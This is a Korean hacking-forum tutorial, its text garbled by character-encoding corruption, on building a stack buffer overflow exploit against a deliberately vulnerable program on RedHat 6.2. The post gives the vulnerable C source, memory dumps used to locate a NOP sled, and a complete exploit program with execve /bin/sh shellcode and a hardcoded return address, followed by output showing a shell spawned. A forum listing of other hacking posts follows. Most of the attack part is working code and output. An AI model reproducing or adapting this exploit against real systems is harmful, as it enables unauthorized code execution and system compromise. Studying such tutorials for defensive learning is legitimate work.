1586, 8/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   buff3r
   http://#include .
   [ÀÚÀÛ]RedHat 6.2 ȯ°æ¿¡¼­ BOF exploit ¸¸µé±â -The Second -

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1438 [º¹»ç]


Àú¹ø¿¡ ¸¸µé¾ú´ø ÀͽºÇ÷ÎÀÕÀº Ãë¾àÇÑ ÇÁ·Î±×·¥ ³»ºÎ ¹öÆ۾ȿ¡¼­
¸ðµçÀÏÀ» ³¡³Â½À´Ï´Ù. À̹ø¿¡´Â buf ¿¡ 4¹ÙÀÌÆ® ¸¸À» ÇÒ´çÇÏ´Â ÇÁ·Î±×·¥À» ÀͽºÇ÷ÎÀÕ
Çغ¸µµ·Ï ÇÏ°Ú½À´Ï´Ù
vuln.c
#include <stdio.h>
#include "dumpcode.h"
int main(int argc,char *argv[])
{
        char buf[4];  // 4¹ÙÀÌÆ®¸¸À» ÇÒ´çÇÕ´Ï´Ù.
                                 // STACK ±¸Á¶ [buf(4)][sfp(4)[ret(4)]
                                 // ¿ì¸®°¡ ÀÌ¿ëÇÒ¼ö Àִ°ø°£Àº 8Byte ÀÔ´Ï´Ù.
                                 // Àú¹ø°ú °°Àº ¹æ¹ýÀ¸·Î´Â ÀͽºÇ÷ÎÀÕÀÌ ºÒ°¡´ÉÇÕ´Ï´Ù.
        strcpy(buf,argv[1]);
        dumpcode(buf,500);
}

±×·¸´Ù¸é ¾î¶»°Ô °ø°ÝÀ» ¼º°ø½ÃÄÑ¾ß ÇÒ±î¿ä . ? ¹æ¹ýÀº µÎ°¡Áö°¡ ÀÖ½À´Ï´Ù.
1. ȯ°æº¯¼ö¸¦ ÀÌ¿ëÇÑ exploit
2. NOP À» ÀÌ¿ëÇÑ exploit
(RTL Àº ÀÏ´Ü »¯½À´Ï´Ù .. ¤»¤»)
À̹ø °­Á¿¡¼­´Â 2¹ø° ¹æ¹ýÀ» ÀÌ¿ëÇÏ°Ú½À´Ï´Ù.
8¹ÙÀÌÆ® ¹Û¿¡ ¾ø´Âµ¥ ¾î¶»°Ô NOPÀ» ³Ö³Ä±¸¿ä ??
¹æ¹ýÀº °£´ÜÇÕ´Ï´Ù. ret µÚ¿¡ NOP °ú ½©Äڵ带 ³Ö¾îÁØÈÄ, ret´Â NOPÁß ¾Æ¹«°÷À̳ª
°¡¸£Å°°Ô ÇϸéµË´Ï´Ù.
°ø°ÝÇÒ ½ºÅñ¸Á¶:
[¾²·¹±â°ª ( 8Byte ) ][ RET ( 8Bye ] [ NOP x 200 ( 200byte) ] [Shellcode ]
                            --------------               ¡è
                                    ¡é                      ¡è
                                    ¡æ¡æ¡æ¡æ¡æ¡æ¡æ¡æ¡æ¡æ

ÀÌ·±½ÄÀ¸·Î ±¸¼ºÇÏ¸é µË´Ï´Ù.
ÀÏ´Ü ret µÚ¿¡ NOPÀÌ PUSH µÉ ÁÖ¼Ò¸¦ ã¾Æº¾½Ã´Ù.
[test@localhost test]$ ./vuln `perl -e 'print "\x90"x600'`
0xbffff904  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff914  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff924  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff934  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff944  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff954  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff964  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff974  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff984  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff994  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9a4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9b4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9c4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9d4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9e4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9f4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa04  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa14  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa24  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa34  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa44  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa54  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa64  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa74  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa84  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa94  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffaa4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffab4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffac4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffad4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffae4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffaf4  90 90 90 90                    

°ø°£ÀÌ Âü ¹«±Ã¹«Áø Çϱº¿ä +-+
¿ì¸®´Â 0xbffff924 ¸¦ ÀÌ¿ëÇսô٠.
ex.c
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"; // This Is Shellcode
int main(int argc, char *argv[])
{
        int i, offset;
        long esp, ret, *addr_ptr;
        char *buffer, *ptr;
        ret = 0xbffff924;  // ¿ì¸®°¡ ÀÌ¿ëÇÒ RET °ª
        buffer = malloc(600);
        ptr = buffer;
        addr_ptr = (long *) ptr;
        for(i=0; i < 600; i+=4)
        { *(addr_ptr++) = ret; }  // ¸ðµç 600 byte¸¦ ret·Î µ¤¾î¾´´Ù
        for(i=0; i < 8; i++)
        { buffer[i] = '\x41'; } // óÀ½ 8 ¹ÙÀÌÆ®¸¦ \x41 (A) ·Î µ¤¾î¾´´Ù.
        ptr = buffer + 12; // ½ºÅà ¸ð½ÀÀÌ [A x 8 (8byte)][RET ( 4byte)] À̹ǷÎ
                                 // NOPÀº ret µÚÀÎ buffer + 12 ºÎÅÍ µ¤¾î¾´´Ù.
        for(i=0; i < 200; i++)
        { *(ptr++) = '\x90'; }   // NOP µ¤¾î¾²±â
        ptr = buffer + 212; // ½©Äڵ尡 À§Ä¡ÇÒ ºÎºÐ
        for(i=0; i < strlen(shellcode); i++)
        { *(ptr++) = shellcode[i]; }   // RET , NOP µÚ¿¡ ½©Äڵ带 µ¤¾î¾´´Ù.

        buffer[600-1] = 0;        
        execl("./vuln", "vuln", buffer, 0);                      // ½ÇÇà
        free(buffer);
        return 0;
}
°ø°ÝÇϱâÀü :
[test@localhost test]$ ps
  PID TTY          TIME CMD
  681 pts/0    00:00:00 bash
  732 pts/0    00:00:00 bash2
  741 pts/0    00:00:00 ps

°ø°Ý :
[test@localhost test]$ ./ex
0xbffff8d4  41 41 41 41 41 41 41 41 24 f9 ff bf 90 90 90 90   AAAAAAAA$.......
0xbffff8e4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff8f4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff904  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff914  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff924  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff934  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff944  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff954  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff964  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff974  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff984  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff994  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9a4  90 90 90 90 31 c0 b0 46 31 db 31 c9 cd 80 eb 16   ....1..F1.1.....
0xbffff9b4  5b 31 c0 88 43 07 89 5b 08 89 43 0c b0 0b 8d 4b   [1..C..[..C....K
0xbffff9c4  08 8d 53 0c cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f   ..S......../bin/
0xbffff9d4  73 68 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   sh..$...$...$...
0xbffff9e4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffff9f4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa04  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa14  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa24  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa34  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa44  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa54  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa64  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa74  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa84  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa94  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffaa4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffab4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffac4  24 f9 ff bf                                       $...
bash$
°ø°Ý ÇÏ°í³­ ÈÄ :
bash$ ps
  PID TTY          TIME CMD
  681 pts/0    00:00:00 bash
  732 pts/0    00:00:00 bash2
  739 pts/0    00:00:00 sh // °ø°ÝÀÌ ¼º°øÇߴٴ°ÍÀ» ¾Ë¼öÀÖ´Ù
  740 pts/0    00:00:00 ps
  Hit : 7780     Date : 2010/03/18 06:55


    
º°ºûÀ»´ã¾Æ ¿©·¯ºÐÀº Áö±Ý buff3r°¡ ¹öÆÛ¸¦ °¡Áö°í ³î°í ÀÖ´Â ±¤°æÀ» º¸°í °è½Ê´Ï´Ù.

¿©Æ° ¼±´ñ±Û ÈÄ°¨»ó		 2010/03/18  
ÃÊÄÝ·¿³ªÀÎ ¹öÆÛ°¡ ¹öÆÛ¸¦ °¡Áö°í ³î°íÀÖ´Â ±¤°æ¤»¤»¤» 2010/03/18  
kjwon15 NOP À» °¡Áö°í ³ë´Â ±¤°æÀ̱º¿ä.. 2010/03/23  
zzguswhd ¾î¶².. ÄÄÆÄÀÏ·¯¸¦ ¾´°Å¿¡¿ä ?; 2010/07/26  
Cpgroot ÁÁÀºÁ¤º¸ µè°í°¨ ..¤·¤µ¤· 2010/08/18  
1446   letmein ´Ô ÇØÄ· Àü±îÁö Ç®¸é µÈ´Ù°í Çß´ø ¹®Á¦¿ä     blueh4g
 02/03 7161
1445   ÇØÅ·¹æ¹ý[12]     bongcheur
 07/07 13422
1444   ÄÄÇ»ÅÍÇØÄ¿[4]     bongcheur
 07/07 9573
1443   Windows NetBios ¸¦ ¾Ç¿ëÇÑ ÇØÅ·¹æ¹ýÀÇ ¿¹¿Í ´ëó¹æ¹ý[3]     bongcheur
 07/07 11061
1442   Å°º¸µåÇØÅ·(º¸¾È)¿¡ ´ëÇØ     bongcheur
 07/07 7744
1441   nProtect Å°º¸µå ÇØÅ·¹æÁö ÇÁ·Î±×·¥ ¼³Ä¡[5]     bongcheur
 07/07 10509
1440   ÇØÅ·Åø[5]     bongcheur
 07/08 10636
1439   ¿ø°ÝÁ¾·á....[39]     bsjzzz
 01/02 12057
1438   ¸®´ª½º ¹æÈ­º®ÀÇ Á¾·ù...[4]     bsjzzz
 01/12 14092
1437   Á¦°¡ Á÷Á¢ ÀÛ¼ºÇÑ Sql Injection ¹®¼­ÀÔ´Ï´Ù .[9]     buff3r
 10/29 8183
1436   [ÀÚÀÛ]°£´ÜÈ÷ NetcatÀ» ÀÌ¿ëÇÏ¿© À©µµ¿ìXP °®°í³î±â[11]     buff3r
 01/03 8227
1435   Start of SQL Injection (¸Å¿ì ±âÃÊ) 1[6]     buff3r
 01/11 8068
1434   Ready to Make a Sql injection tool[5]     buff3r
 01/15 7895
1433   [BASE]Making SQL injection tool 1/3[3]     buff3r
 01/20 7055
1432   [BT4_han.iso]USBºÎÆÃÇÏ´Â ¹æ¹ý For º°ºûÀ»´ã¾Æ[5]     buff3r
 02/22 10330
1431   [ÀÚÀÛ] M4k3 Xploits :D[2]     buff3r
 03/06 7105
1430   [ÀÚÀÛ]RedHat 6.2 ȯ°æ¿¡¼­ BOF exploit ¸¸µé±â[6]     buff3r
 03/17 13459
  [ÀÚÀÛ]RedHat 6.2 ȯ°æ¿¡¼­ BOF exploit ¸¸µé±â -The Second -[5]     buff3r
 03/18 7779
1428   Fedora Core 3 local based buffer overflow[3]     buff3r
 08/22 7683
1427   ;cat À» »ç¿ëÇÏ´Â ÀÌÀ¯ .[3]     bugfixer2
 05/18 10599
[1][2][3][4][5][6][7] 8 [9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org